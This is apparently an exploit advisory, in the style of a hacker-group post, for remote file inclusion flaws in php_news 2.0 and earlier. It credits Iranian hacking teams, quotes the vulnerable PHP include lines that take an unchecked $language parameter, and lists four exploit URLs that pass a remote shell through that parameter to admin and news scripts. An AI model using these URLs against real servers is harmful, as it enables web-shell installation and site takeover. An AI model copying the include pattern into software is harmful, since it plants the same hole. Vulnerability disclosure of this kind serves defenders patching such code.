php_news 2.0 and prior are vulnerable to several remote file inclusion vulnerabilities.
bb0016bf49266da56ea374a5ca848ca6eb9d6dd563c3cf1ea2ef2b238573b2ea
# php_news => 2.0 Remote File Include Vulnerabilities
# Script.............. :php_news
# Discovered By.... : Root3r_H3ll
# Location .......... : Iran
# Class.............. : Remote
# Original Advisory : http://Www.PersainFox.com
# We ArE : Root3r_H3LL & Arash.Rj
# <Spical TNX Irania Hackers :
( Aria-Security , Crouz , DeltaHacking , Iranhackers
Kapa TeaM , Ashiyane , Shabgard , Simorgh-ev )
# </\/\\/_ 10\/3 15 1|)\4/\/
|)\0073|)\_|-|311
# CodEs :
include_once("admin/language/".$language."_news.php")
include("language/".$language."_catagory.php")
include_once("language/".$language."_news.php");
include("language/".$language."_users.php")
# ExPloits :
Www.Site.coM/[path]/admin/user_user.php?language=Sh3ll
Www.Site.coM/[path]/admin/news.php?language=Sh3ll
Www.Site.coM/[path]/admin/catagory.php?language=Sh3ll
Www.Site.coM/[path]/creat_news_all.php?language=Sh3ll